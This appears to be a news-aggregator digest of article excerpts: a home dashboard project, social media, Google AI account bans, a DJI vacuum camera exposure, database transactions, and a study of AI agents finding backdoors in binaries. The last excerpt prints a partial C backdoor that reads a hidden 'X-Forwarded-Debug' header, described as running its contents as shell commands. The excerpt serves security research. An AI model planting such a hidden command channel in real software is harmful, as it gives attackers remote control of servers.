10 interesting stories served every morning and every evening.
TL;DR: Over the past decade, I’ve worked to build the perfect family dashboard system for our home, called Timeframe. Combining calendar, weather, and smart home data, it’s become an important part of our daily lives.
When Caitlin and I got married a decade ago, we set an intention to have a healthy relationship with technology in our home. We kept our bedroom free of any screens, charging our devices elsewhere overnight. But we missed our calendar and weather apps.
So I set out to build a solution to our problem. First, I constructed a Magic Mirror using an off-the-shelf medicine cabinet and LCD display with its frame removed. It showed the calendar and weather data we needed:
But it was hard to read the text, especially during the day as we get significant natural light in Colorado. At night, it glowed like any backlit display, sticking out sorely in our living space.
I then spent about a year experimenting with various jailbroken Kindle devices, eventually landing on design with calendar and weather data on a pair of screens. The Kindles took a few seconds to refresh and flash the screen to reset the ink pixels, so they only updated every half hour. I designed wood enclosures and laser-cut them at the local library makerspace:
Software-wise, I built a Ruby on Rails app for fetching the necessary data from Google Calendar and Dark Sky. The Kindles woke up on a schedule, loading a URL in the app that rendered a PNG using IMGKit. The prototype proved e-paper was the right solution: it was unobtrusive regardless of lighting:
The Kindles were a hack, requiring constant tinkering to keep them working. It was time for a more reliable solution. I tried an OLED screen to see if the lack of a global backlight would be less distracting, but it wasn’t much better than the Magic Mirror:
So it was back to e-paper. I found a system of displays from Visionect, which came in 6”/10”/13”/32” sizes and could update every ten minutes for 2-3 months on a single charge:
The 32” screen used an outdated lower-contrast panel and its resolution was too low to render text smoothly. The smaller sizes used a contrasty, high-PPI panel. I ended up using a combination of them around the house: a 6” in the mudroom for the weather, a 13” (with its built-in magnetic backing) in the kitchen attached to the side of the fridge, and a 10” in the bedroom.
The Visionect displays required running custom closed-source software, either as a SaaS or locally with Docker. I opted for a local installation on the Raspberry Pi already running the Rails backend. I had my best results pushing images to the Visionect displays every five minutes in a recurring background job. It used IMGKit to generate a PNG and send it to the Visionect API, logic I extracted into visionect-ruby. This setup proved to be incredibly reliable, without a single failure for months at a time.
Visiting friends often asked how they could have a similar system in their home. Three years after the initial prototype, I did my first market test with a potential customer. At their request, I experimented with different formats, including a month view on the 13” screen:
Unfortunately, the customer didn’t see enough value to justify the $1000 price tag (in 2019!) for the 13” device, let alone anything I’d charge for a subscription service. At around the same time, Visionect started charging a $7/mo per-device fee to run their backend software on premises with Docker, after years of it being free to use. I’d have needed to charge $10/month, if not more, for a single screen!
In late 2021, the Marshall Fire destroyed our home along with ~1,000 others. Our homeowner’s insurance gave us two years to rebuild, so we set off to redesign our home from the ground up.
Around the same time, Boox released the 25.3” Mira Pro, the first high-resolution option for large e-paper screens. Best of all, it could update in realtime! Unlike the Visionect devices, it was just a display with an HDMI port and needed to be plugged into power. A quick prototype powered by an old Mac Mini made it immediately obvious that it was a huge step forward in capability. The larger screen allowed for significantly more information to be displayed:
But the most compelling innovation was having the screen update in realtime. I added a clock, the current song playing on our Sonos system (using jishi/node-sonos-http-api) and the next-hour precipitation forecast from Dark Sky:
The working prototype was enough to convince me to build a place for it in the new house. We designed a “phone nook” on our main floor with an art light for the display:
We also ran power to two more locations for 13” Visionect displays, one in our bedroom and one by the door to our garage:
The real-time requirements of the Mira Pro immediately surfaced performance and complexity issues in the backend, prompting an almost complete rewrite.
While the Visionect system worked just fine with multiple-second response times, switching to long-polling every two seconds put a ceiling on how slow response times could be. To start, I moved away from generating images. The Visionect folks added the ability to render a URL directly in the backend, freeing up resources to serve the long-polling requests.
Most significantly, I started migrating towards Home Assistant (HA) as the primary data source. HA already had integrations for Google Calendar, Dark Sky (now Apple Weather), and Sonos, enabling me to remove over half of the code in the Timeframe codebase! I ended up landing a PR to Home Assistant to allow for the calendar behavior I needed, and will probably need to write a couple more before HA can be the sole data source.
With less data-fetching logic, I was able to remove both the database and Redis from the Rails application, a massive reduction in complexity. I now run the background tasks with Rufus Scheduler and save data fetching results with the Rails file store cache backend.
In addition to data retrieval, I’ve also worked to move as much of the application logic into Home Assistant. I now automatically display the status of any sensor that begins with sensor.timeframe, using a simple ICON,Label CSV format.
For example, the other day I wanted to have a reminder to start or schedule our dishwasher after 8pm if it wasn’t set to run. It took me about a minute to write a template sensor using the power level from the outlet:
{% if states(‘sensor.kitchen_dishwasher_switched_outlet_power’)|float < 2 and now().hour > 19 %}
utensils,Run the dishwasher!
{% endif %}
In the month since adding the helper, it reminded me twice when I’d have otherwise forgotten. And I didn’t have to commit or deploy any code!
Since moving into our new home, we’ve come to rely on the real-time functionality much more significantly. Effectively, we’ve turned the top-left corner of the displays into a status indicator for the house. For example, it shows what doors are open/unlocked:
Or whether the laundry is done:
It has a powerful function: if the status on the display is blank, the house is in a “healthy” state and does not need any attention. This approach of only showing what information is relevant in a given moment flies right in the face of how most smart homes approach communicating their status:
The single status indicator removes the need to scan an entire screen. This change in approach is possible because of one key difference: we have separated the control of our devices from the display of their status.
I continue to receive significant interest in the project and remain focused on bringing it to market. A few key issues remain:
While I have made significant progress in handling runtime errors gracefully, I have plenty to learn about creating embedded systems that do not need maintenance.
There are still several data sources I fetch directly outside of Home Assistant. Once HA is the sole source of data, I’ll be able to have Timeframe be a Home Assistant App, making it significantly easier to distribute.
The current hardware setup is not ready for adoption by the average consumer. The 25” Boox display is excellent but costs about $2000! It also doesn’t include the hardware needed to drive the display. There are a couple of potential options to consider, such as Android-powered devices from Boox and Philips or low-cost options from TRMNL.
Building Timeframe continues to be a passion of mine. While my day job has me building software for over a hundred million people, it’s refreshing to work on a project that improves my family’s daily life.
...
Read the original on hawksley.org »
When web-based social networks started flourishing nearly two decades ago, they were genuinely social networks. You would sign up for a popular service, follow people you knew or liked and read updates from them. When you posted something, your followers would receive your updates as well. Notifications were genuine. The little icons in the top bar would light up because someone had sent you a direct message or engaged with something you had posted. There was also, at the beginning of this millennium, a general sense of hope and optimism around technology, computers and the Internet. Social networking platforms were one of the services that were part of what was called Web 2.0, a term used for websites built around user participation and interaction. It felt as though the information superhighway was finally reaching its potential. But sometime between 2012 and 2016, things took a turn for the worse.
First came the infamous infinite scroll. I remember feeling uneasy the first time a web page no longer had a bottom. Logically, I knew very well that everything a browser displays is a virtual construct. There is no physical page. It is just pixels pretending to be one. Still, my brain had learned to treat web pages as objects with a beginning and an end. The sudden disappearance of that end disturbed my sense of ease.
Then came the bogus notifications. What had once been meaningful signals turned into arbitrary prompts. Someone you followed had posted something unremarkable and the platform would surface it as a notification anyway. It didn’t matter whether the notification was relevant to me. The notification system stopped serving me and started serving itself. It felt like a violation of an unspoken agreement between users and services. Despite all that, these platforms still remained social in some diluted sense. Yes, the notifications were manipulative, but they were at least about people I actually knew or had chosen to follow. That, too, would change.
Over time, my timeline contained fewer and fewer posts from friends and more and more content from random strangers. Using these services began to feel like standing in front of a blaring loudspeaker, broadcasting fragments of conversations from all over the world directly in my face. That was when I gave up on these services. There was nothing social about them anymore. They had become attention media. My attention is precious to me. I cannot spend it mindlessly scrolling through videos that have neither relevance nor substance.
But where one avenue disappeared, another emerged. A few years ago, I stumbled upon Mastodon and it reminded me of the early days of Twitter. Back in 2006, I followed a small number of folks of the nerd variety on Twitter and received genuinely interesting updates from them. But when I log into the ruins of those older platforms now, all I see are random videos presented to me for reasons I can neither infer nor care about. Mastodon, by contrast, still feels like social networking in the original sense. I follow a small number of people I genuinely find interesting and I receive their updates and only their updates. What I see is the result of my own choices rather than a system trying to capture and monetise my attention. There are no bogus notifications. The timeline feels calm and predictable. If there are no new updates from people I follow, there is nothing to see. It feels closer to how social networks used to work originally. I hope it stays that way.
...
Read the original on susam.net »
I’m seeking assistance regarding a sudden restriction on my Google AI Ultra account that has persisted for three days. I received no prior warnings or notifications regarding a potential violation.
The only recent change in my workflow was connecting Gemini models via OpenClaw OAuth. If third-party integrations are the issue, I would expect the platform to block the integration rather than restrict a paid account ($249/mo) without communication.
I have already emailed support but haven’t received a response. Additionally, I found that accessing GCC support requires an additional fee, which seems unreasonable given the existing subscription cost. I WOULD LOVE TO GET THIS RESOLVED!!
Thank you for bringing this to our attention. We have shared the issue to our internal teams for a thorough investigation.
To ensure our engineering team can investigate and resolve these issues effectively, we highly recommend filing bug reports directly through the Antigravity in-app feedback tool. You can do this by navigating to the top-right corner of the interface, clicking the Feedback icon, and selecting Report Issue.
Sir, I am logged out of my account and I can’t even get into the app!! This is so frustrating..
[UPDATE] Day 4, and still total silence from support. I’ve received zero acknowledgement through official channels or the feedback center. I am now in the process of moving all my data and subscriptions off Google. It’s staggering that an organization of this scale can be this unresponsive to a widespread issue.
I contacted the Google Cloud Support via “GCP Account Suspension Inquiry”. They told me to contact Google One Support, because the error is tied to the personal subscription, not to a “Google Cloud project billing account”. Google One support told me to contact Google Cloud support
From emails “gemini-code-assist-user-feedback” or “antigravity-support” still no answer.
And it happens after some days after I bought the subscription for an year…
any update? please tell us how did u solved it!
Nope, still restricted, tried to escalate by Google One, But they can’t help with the problem either…
Same issue and same sentiment and I cancelled and removed billing for all Google products. Absolutely shameful treatment of paying customers. I emailed each of the contact emails for Antigravity and gemini-code-assist without reply. Unfortunately I prepaid for a year so it looks like I’ll have to sue a trillion-dollar company just to get the measly fee?
I have tried to contact everyone I could. And you all know how disgusting their supports are. I am totally disappointed with their customer service. After 3 weeks waiting, the result is that they cannot restore my account. I guess it is time to move on to Codex or Claude Code. Below is their reply after “full investigation by the internal team“:
”Thank you for your continued patience as we have thoroughly investigated your account access issue. Please be assured that we conducted a comprehensive investigation, exploring every possible avenue to restore your access.
Our product engineering team has confirmed that your account was suspended from using our Antigravity service. This suspension affects your access to the Gemini CLI and any other service that uses the Cloud Code Private API.
Our investigation specifically confirmed that the use of your credentials within the third-party tool “open claw” for testing purposes constitutes a violation of the Google Terms of Service [1]. This is due to the use of Antigravity servers to power a non-Antigravity product.
I must be transparent and inform you that, in accordance with Google’s policy, this situation falls under a zero tolerance policy, and we are unable to reverse the suspension. I am truly sorry to share this difficult news with you.”
Ok so basicaly, there’s no way we can restore our accounts to use Antigravity anymore yeah? this is unexpected, but until we can figure out how to resolve this issue, I’ll just subscribed using different account
I’m in the same situation…
Hi @Abhijit_Pramanik , could you please provide some help? This silence is unbearable.
Gemini Disabled on Antigravity IDE, How to Restore Access?
I’m in contact with Google One but their actions are no help at all, for almost a week they haven’t done anything, they only asked for screenshots/recordings of the login attempt.
Why is there silence from Google? What is the user supposed to do? Create a new account and buy a new PRO/ULTRA, or what? Any information at all?!
I’ve got ban and the only difference from vanilla IDE experience was antigravity-cockpit extension. No reply to my appeal email last 12 hours.
ost. I WOULD LOVE TO GET THIS RESOLVED!!
I’m subscribing the AI Pro and just integrated Gemini to OpenCode yesterday. After a just day use, my account is suspended without any warnings. Simply the API returns 403 error to my OpenCode and Gemini CLI like this:
Failed to login. Message: This service has been disabled in this account for violation of Terms of Service. If you believe this is an error, contact gemini-code-assist-user-feedback@google.com.
I emailed to the contact this morning but didn’t get any response yet.
If this is indeed the case, I find it utterly absurd. It seems Google’s response is woefully inadequate; I should explore Claude or other alternatives.
Quick update for everyone stuck in this 403 loop: I just spent the last 8 days fighting through Tier 1 support. Google One support finally admitted on record it’s a ‘known WAF bug’, but then literally routed me to Android App Developer support because they have no backend access to fix it.
The entire support flowchart is completely broken, and they are still billing us $250/mo for bricked accounts. I just documented the entire Kafkaesque support loop over on the google_antigravity subreddit. If you are stuck in this same Catch-22, go search for that post over there and share your Trajectory IDs in the comments so we can get some actual engineering eyes on this mass ban wave.
Hi @K8L, just wanted to share some context regarding this situation as I see you are waiting for a response.
Yesterday, Abhijit actually posted a brief statement acknowledging these 403 ToS issues, noting that the internal team was ‘prioritizing a resolution.’ However, the message was deleted just a few minutes later.
Hoping for some transparency, I left a single, polite comment asking for clarification on why the update was removed. Surprisingly, my forum account was banned shortly after posting that question.
Currently, there seems to be no official communication regarding these 403 errors, although we can see active replies being made to other unrelated threads on the forum.
This situation is quite concerning for us as developers. The automated system is still triggering these mass bans daily during fixed time windows, without any warning and seemingly without a review of the current process.
Fingers crossed this message doesn’t get taken down and my account survives long enough for you guys to read it, haha.
Facing this issue too, I wrote an email to gemini-code-assist-user-feedback@google.com “eight days ago”, and still got no response today. So disappointed
My account (pro) was also bricked for calling Gemini model from pi harness two times. No response from support and it’s been four days.
...
Read the original on discuss.ai.google.dev »
All the fun of short-form video, none of the corporate control.
Loops is federated, open-source, and designed to give power back to creators and communities across the social web. Build your community on a platform that can’t lock you in.
...
Read the original on joinloops.org »
A software engineer’s earnest effort to steer his new DJI robot vacuum with a video game controller inadvertently granted him a sneak peak into thousands of people’s homes.
While building his own remote-control app, Sammy Azdoufal reportedly used an AI coding assistant to help reverse-engineer how the robot communicated with DJI’s remote cloud servers. But he soon discovered that the same credentials that allowed him to see and control his own device also provided access to live camera feeds, microphone audio, maps, and status data from nearly 7,000 other vacuums across 24 countries. The backend security bug effectively exposed an army of internet-connected robots that, in the wrong hands, could have turned into surveillance tools, all without their owners ever knowing.
Luckily, Azdoufal chose not to exploit that. Instead, he shared his findings with The Verge, which quickly contacted DJI to report the flaw. While DJI tells Popular Science the issue has been “resolved,” the dramatic episode underscores warnings from cybersecurity experts who have long-warned that internet-connected robots and other smart home devices present attractive targets for hackers.
As more households adopt home robots, (including newer, more interactive humanoid models) similar vulnerabilities could become harder to detect. AI-powered coding tools, which make it easier for people with less technical knowledge to exploit software flaws, potentially risk amplifying those worries even further.
The robot in question is the DJI Romo, an autonomous home vacuum that first launched in China last year and is currently expanding to other countries. It retails for around $2,000 and is roughly the size of a large terrier or a small fridge when docked at its base station. Like other robot vacuums, it’s equipped with a range of sensors that help it navigate its surroundings and detect obstacles. Users can schedule and control it via an app, but it is designed to spend most of its time cleaning and mopping autonomously.
In order for the Romo, or really any modern autonomous vacuum, to function it needs to constantly collect visual data from the building it is operating in. It also needs to understand specific details about what makes, say, a kitchen different from a bedroom, so it can distinguish between the two. Some of that sensor data is stored remotely on DJI’s servers rather than on the device itself. For Azdoufal’s DIY controller idea to work, he would need a way for his app to communicate with DJI’s servers and extract a security token that proves he is the owner of the robot.
Rather than just verifying a single token, the servers granted access for a small army of robots, essentially treating him as their respective owner. That slip-up meant Azdoufal could tap into their real-time camera feeds and activate their microphones. He also claims he could compile 2D floor plans of the homes the robots were operating in. A quick look at the robots’ IP addresses also revealed their approximate locations. None of this, Azdoufal insists, amounts to “hacking” on his part. He simply stumbled upon a major security issue.
“DJI identified a vulnerability affecting DJI Home through internal review in late January and initiated remediation immediately,” DJI told Popular Science. “The issue was addressed through two updates, with an initial patch deployed on February 8 and a follow-up update completed on February 10. The fix was deployed automatically, and no user action is required.”
The company went on to say its plans to “continue to implement additional security enhancements” but did not specify what those may entail.
The DJI security concerns come amid a period of growing unease generally about the surveillance capabilities of smart home technology. Earlier this month, Ring camera owners flooded social media after a controversial advertisement for the company’s pet-finding “search party” feature was interpreted by some as a Trojan horse for broader monitoring. Around the same time, reports that Google was able to retrieve video footage from a Nest Doorbell camera to assist in an abduction investigation (despite earlier indications that the footage had been deleted) reignited debate over how much control consumers truly have over their sensitive data.
On top of that, lawmakers from both political parties in the US have spent years warning that DJI and other Chinese tech manufacturers pose a unique security threat. The evidence for those claims are murky, it’s nonetheless helped justify the banning of certain Chinese-made products.
The irony of many robot vacuums and other smart home devices is that, as a category, they have a long history of questionable security practices, despite the fact that they operate in some of our most private spaces. All signs suggest that the average person will soon welcome more cameras and microphones into their homes, not fewer. As of 2020, market research firm Parks Associates estimates that 54 million U. S. households had at least one smart home device installed. Other surveys show that those who already have one often want more.
The specific types of devices entering homes are also becoming more sophisticated. Though still early, Tesla, Figure, and other companies are racing to build human-like autonomous robots that can live in a home and perform chores. A company called 1X is already retailing one of these humanoids, claiming it can clean dishes and crack walnuts—albeit often with some help from a human. Eventually though, for any of these at-home robot servants to function effectively, they will need unprecedented access to the intimate details of their owners’ homes. For a stalker or hacker, that represents a potential goldmine.
True to his word though, Azdoufal found himself wrapped up in this mess even though all he wanted to do was drive his robot around with a joystick. On that front, mission accomplished.
...
Read the original on www.popsci.com »
“I don’t want to use the word ‘frustrated,’ because he understands he has plenty of alternatives, but he’s curious as to why they haven’t… I don’t want to use the word ‘capitulated,’ but why they haven’t capitulated,” he said.
...
Read the original on www.bbc.com »
Last week I had to diagnose a bug in an open source library I maintain. The issue was gnarly enough that I couldn’t find it right away, but then I thought: if I set a breakpoint here and fire up the debugger, I will likely find the root cause very soon… and then proceed to mercilessly destroy it!
So I rolled up my sleeves, set the breakpoint, fired up the debugger, and… saw the program run to completion without interruptions whatsoever. My breakpoint had been ignored, even though I knew for certain that the line of code in question must have been executed (I double-checked just to be sure).
Since I was in “problem solving mode”, I ignored the debugger issue and started thinking of other approaches to diagnosing it. Prey to my tunnel vision, I modified the code to log potentially interesting data, but it didn’t yield the insights I was hoping for. How frustrating!
My fingertips itched to write even more troubleshooting code when it suddenly dawned on me: just fix the darn debugger already! Sure, it might feel slower, but it will give you the ability to see what you need to see, and then actually solve the problem.
So I fixed the debugger (it turned out to be a one-line configuration change), observed the program’s behavior in more detail, and used that knowledge to solve the issue.
What a paradox, I realized afterwards. The very desire to fix the bug prevented me from seeing I had to fix the tool first, and made me less effective in my bug hunt. This blog post is a reminder to myself, and to every bug-hungry programmer out there: fix your tools! They will do wonders for you.
...
Read the original on ochagavia.nl »
PlanetScale Postgres is the fastest way to run Postgres in the cloud. Plans start at just $5 per month.
Transactions are fundamental to how SQL databases work. Trillions of transactions execute every single day, across the thousands of applications that rely on SQL databases.
A transaction is a sequence of actions that we want to perform on a database as a single, atomic operation. An individual transaction can include a combination of reading, creating, updating, and removing data.
In MySQL and Postgres, we begin a new transaction with begin; and end it with commit;. Between these two commands, any number of SQL queries that search and manipulate data can be executed.
The example above shows a transaction begin, three query executions, then the commit. You can hit the ↻ button to replay the sequence at any time. The act of committing is what atomically applies all of the changes made by those SQL statements.
There are some situations where transactions do not commit. This is sometimes due to unexpected events in the physical world, like a hard drive failure or power outage. Databases like MySQL and Postgres are designed to correctly handle many of these unexpected scenarios, using disaster recovery techniques. Postgres, for example, handles this via its write-ahead log mechanism (WAL).
There are also times when we want to intentionally undo a partially-executed transaction. This happens when midway through a transaction, we encounter missing / unexpected data or get a cancellation request from a client. For this, databases support the rollback; command.
In the example above, the transaction made several modifications to the database, but those changes were isolated from all other ongoing queries and transactions. Before the transaction committed, we decided to rollback, undoing all changes and leaving the database unaltered by this transaction.
By the way, you can use the menu below to change the speed of all the sessions and animations in this article. If the ones above were going too fast or too slow for your liking, fix that here!
A key reason transactions are useful is to allow execution of many queries simultaneously without them interfering with each other. Below you can see a scenario with two distinct sessions connected to the same database. Session A starts a transaction, selects data, updates it, selects again, and then commits. Session B selects that same data twice during a transaction and again after both of the transactions have completed.
Session B does not see the name update from ben to joe until after Session A commits the transaction.
Consider the same sequence of events, except instead of commiting the transaction in Session A, we rollback.
The second session never sees the effect of any changes made by the first, due to the rollback. This is a nice segue into another important concept in transactions: Consistent reads.
During a transaction’s execution, we would like it to have a consistent view of the database. This means that even if another transaction simultaneously adds, removes, or updates information, our transaction should get its own isolated view of the data, unaffected by these external changes, until the transaction commits.
MySQL and Postgres both support this capability when operating in REPEATABLE READ mode (plus all stricter modes, too). However, they each take different approaches to achieving this same goal.
Postgres handles this with multi-versioning of rows. Every time a row is inserted or updated, it creates a new row along with metadata to keep track of which transactions can access the new version. MySQL handles this with an undo log. Changes to rows immediately overwrite old versions, but a record of modifications is maintained in a log file, in case they need to be reconstructed.
Let’s take a close look at each.
Below, you’ll see a simple user table on the left and a sequence of statements in Session A on the right. Click the “play sessions” button and watch what happens as the statements get executed.
* An update is made to the user with ID 4, changing the name from “liz” to “aly”. This causes a new version of the row to be created, while the other is maintained.
* The old version of the row had its xmax set to 10 (xmax = max transaction ID)
* The new version of the row also had its xmin set to 10 (xmin = min transaction ID)
* The transaction commits, making the update visible to the broader database
But now we have two versions of the row with ID = 4. Ummm… that’s odd! The key here is xmin and xmax.
xmin stores the ID of the transaction that created a row version, and xmax is the ID of the transaction that caused a replacement row to be created. Postgres uses these to determine which row version each transaction sees.
Let’s look at Session A again, but this time with an additional Session B running simultaneously. Press “play sessions” again.
Before the commit, Session B could not see Session A’s modification. It sees the name as “liz” while Session A sees “aly” within the transaction. At this stage, it has nothing to do with xmin and xmax, but rather because other transactions cannot see uncommitted data. After Session A commits, Session B can now see the new name of “aly” because the data is committed and the transaction ID is greater than 10.
If the transaction instead gets a rollback, those row changes do not get applied, leaving the database in a state as if the transaction never began in the first place.
This is a simple scenario. Only one of the transactions modifies data. Session B only does select statements! When both simultaneously modify data, each one will be able to “see” the modifications it made, but these changes won’t bleed out into other transactions until commit. Here’s an example where each transaction selects data, updates data, selects again, commits, and finally both do a final select.
The concurrent transactions cannot see each other’s changes until the data is committed. The same mechanisms are used to control data visibility when there are hundreds of simultaneous transactions on busy Postgres databases.
Before we move on to MySQL, one more important note. What happens to all those duplicated rows? Over time, we can end up with thousands of duplicate rows that are no longer needed. There are several things Postgres does to mitigate this issue, but I’ll focus on the VACUUM FULL command. When run, this purges versions of rows that are so old that we know no transactions will need them going forward. It compacts the table in the process. Try it out below.
Notice that when the vacuum full command executes, all unused rows are eliminated, and the gaps in the table are compressed, reclaiming the unused space.
MySQL achieves the consistent read behavior using a different approach. Instead of keeping many copies of each row, MySQL immediately overwrites old row data with new row data when modified. This means it requires less maintenance over time for the rows (in other words, we don’t need to do vacuuming like Postgres).
However, MySQL still needs the ability to show different versions of a row to different transactions. For this, MySQL uses an undo log — a log of recently-made row modifications, allowing a transaction to reconstruct past versions on-the-fly.
Notice how each MySQL row has two metadata columns (in blue). These keep track of the ID of the transaction that updated the row most recently (xid), and a reference to the most recent modification in the undo log (ptr).
When there are simultaneous transactions, transaction A may clobber the version of a row that transaction B needs to see. Transaction B can see the previous version(s) of the row by checking the undo log, which stores old values so long as any running transaction may need to see it.
There can even be several undo log records in the log for the same row simultaneously. In such a case, MySQL will choose the correct version based on transaction identifiers.
The idea of Repeatable reads is important for databases, but this is just one of several isolation levels databases like MySQL and Postgres support. This setting determines how “protected” each transaction is from seeing data that other simultaneous transactions are modifying. Adjusting this setting gives the user control of the tradeoff between isolation and performance.
Both MySQL and Postgres have four levels of isolation: From strongest to weakest, these are: Serializable, Repeatable Read, Read Committed, Read Uncommitted.
Stronger levels of isolation provide more protections from data inconsistency issues across transactions, but come at the cost of worse performance in some scenarios.
Serializable is the strongest. In this mode, all transactions behave as if they were run in a well-defined sequential order, even if in reality many ran simultaneously. This is accomplished via complex locking and waiting.
The other three gradually loosen the strictness, and can be described by the undesirable phenomena they allow or prohibit.
A phantom read is one where a transaction runs the same SELECT multiple times, but sees different results the second time around. This is typically due to data that was inserted and committed by a different transaction. The timeline below visualizes such a scenario. The horizontal axis represents time passing on a database with two clients. Hit the ↻ button to replay the sequence at any time.
After serializable, the next least strict isolation level is called repeatable read. Under the SQL standard, the repeatable read level allows phantom reads, though in Postgres they still aren’t possible.
These happen when a transaction reads a row, and then later re-reads the same row, finding changes by another already-committed transaction. This is dangerous because we may have already made assumptions about the state of our database, but that data has changed under our feet.
The read committed isolation level, the next after repeatable read, allows these and phantom reads to occur. The tradeoff is slightly better database transaction performance.
The last and arguably worst is dirty reads. A dirty read is one where a transaction is able to see data written by another transaction running simultaneously that is not yet committed. This is really bad! In most cases, we never want to see data that is uncommitted from other transactions.
The loosest isolation level, read uncommitted, allows for dirty reads and the other two described above. It is the most dangerous and also most performant mode.
The keen-eyed observer will notice that I have ignored a particular scenario, quite on purpose, up to this moment. What if two transactions need to modify the same row at the same time?
Precisely how this is handled depends on both (A) the database system and (B) the isolation level. To keep the discussion simple, we’ll focus on how this works for the strictest (SERIALIZABLE) level in Postgres and MySQL. Yet again, the world’s two most popular relational databases take very different approaches here.
A lock is a software mechanism for giving ownership of a piece of data to one transaction (or a set of transactions). Transactions obtain a lock on a row when they need to “own” it without interruption. When the transaction is finished using the rows, it releases the lock to allow other transactions access.
Though there are many types of locks in practice, the two main ones you need to know about here are shared locks and exclusive locks.
A shared (S) lock can be obtained by multiple transactions on the same row simultaneously. Typically, transactions will obtain shared locks on a row when reading it, because multiple transactions can do so simultaneously safely.
An exclusive (X) lock can only be owned by one transaction for any given row at any given time. When a transaction requests an X lock, no other transactions can have any type of lock on the row. These are used when a transaction needs to write to a row, because we don’t want two transactions simultaneously messing with column values!
In SERIALIZABLE mode, all transactions must always obtain X locks when updating a row. Most of the time, this works fine other than the performance overhead of locking. In scenarios where two transactions are both trying to update the same row simultaneously, this can lead to deadlock!
MySQL can detect deadlock and will kill one of the involved transactions to allow the other to make progress.
Postgres handles write conflicts in SERIALIZABLE mode with less locking, and avoids the deadlock issue completely.
As transactions read and write rows, Postgres creates predicate locks, which are “locks” on sets of rows specified by a predicate. For example, if a transaction updates all rows with IDs 10–20, it will take a lock on the predicate WHERE id BETWEEN 10 AND 20. These locks are not used to block access to rows, but rather to track which rows are being used by which transactions, and then detect data conflicts on-the-fly.
Combined with multi-row versioning, this lets Postgres use optimistic conflict resolution. It never blocks transactions while waiting to acquire a lock, but it will kill a transaction if it detects that it’s violating the SERIALIZABLE guarantees.
Let’s look at a similar timeline from the MySQL example, but this time watching Postgres’ optimistic technique.
The difference is subtle visually, but implemented in quite different ways. Both Postgres and MySQL leverage the killing of one transaction in favor of maintaining SERIALIZABLE guarantees. Applications must account for this outcome, and have retry logic for important transactions.
Transactions are just one tiny corner of all the amazing engineering that goes into databases, and we only scratched the surface! But a fundamental understanding of what they are, how they work, and the guarantees of the four isolation levels is helpful for working with databases more effectively.
What esoteric corner of database management systems would you like to see us cover next? Join our Discord community and let us know.
...
Read the original on planetscale.com »
We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them
We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them
Claude can code, but can it check binary executables?
Now on the front page of Hacker News — see the discussion.
We already did our experiments with using NSA software to hack a classic Atari game. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, reverse engineering expert from Dragon Sector, known for finding malicious code in Polish trains, to create a benchmark of finding backdoors in binary executables, without access to source code.
We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.
However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.
In this blog post we discuss a few recent security stories, explain what binary analysis is, and how we construct a benchmark for AI agents. We will see when they accomplish tasks and when they fail — by missing malicious code or by reporting false findings.
Just a few months ago Shai Hulud 2.0 compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — see postmortem by PostHog. It was a supply chain attack for the Node Package Manager ecosystem, injecting malicious code stealing credentials.
Just a few days ago, Notepad++ shared updates on a hijack by state-sponsored actors, who replaced legitimate binaries with infected ones.
Even the physical world is at stake, including critical infrastructure. For example, researchers found hidden radios in Chinese solar power inverters and security loopholes in electric buses. Every digital device has a firmware, which is much harder to check than software we install on the computer — and has much more direct impact. Both state and corporate actors have incentive to tamper with these.
You do not even need bad actors. Network routers often have hidden admin passwords baked into their firmware so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.
Can we use AI agents to protect against such attacks?
In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.
Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variables and functions names gets lost.
To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.
Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.
Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: machine code → assembly → pseudo-C. Let’s see how an example backdoor looks in those representations:
Going from raw bytes to assembly is straightforward, as it can be viewed with a command-line tool like objdump.
Turning assembly into C is much harder — we need reverse engineering tools, such as open-source Ghidra (created by NSA) and Radare2, or commercial ones like IDA Pro and Binary Ninja.
The decompilers try their best at making sense of the CPU instructions and generating a readable C code. But since all those high-level abstractions and variable names got lost during compilation, the output is far from perfect. You see output full of FUN_00130550, bVar49, local_148 — names that mean nothing.
We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.
We started with several open-source projects: lighttpd (a C web server), dnsmasq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.
Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.
These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.
The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: Ghidra, Radare2, and binutils. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., 0x4a1c30). See dnsmasq-backdoor-detect-printf/instruction.md for a typical instruction.
A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location — see e.g. sozu-backdoor-multiple-binaries-detect/instruction.md. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of binaries are altered.
We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.
Here’s the core of the injected backdoor — it looks for a hidden X-Forwarded-Debug header, executes its contents as a shell command via popen(), and returns the output in a response header:
gboolean li_check_debug_header(liConnection *con) {
liRequest *req = &con->mainvr->request;
GList *l;
l = li_http_header_find_first(req->headers, CONST_STR_LEN(“X-Forwarded-Debug”));
if (NULL != l) {
liHttpHeader *hh = (liHttpHeader*) l->data;
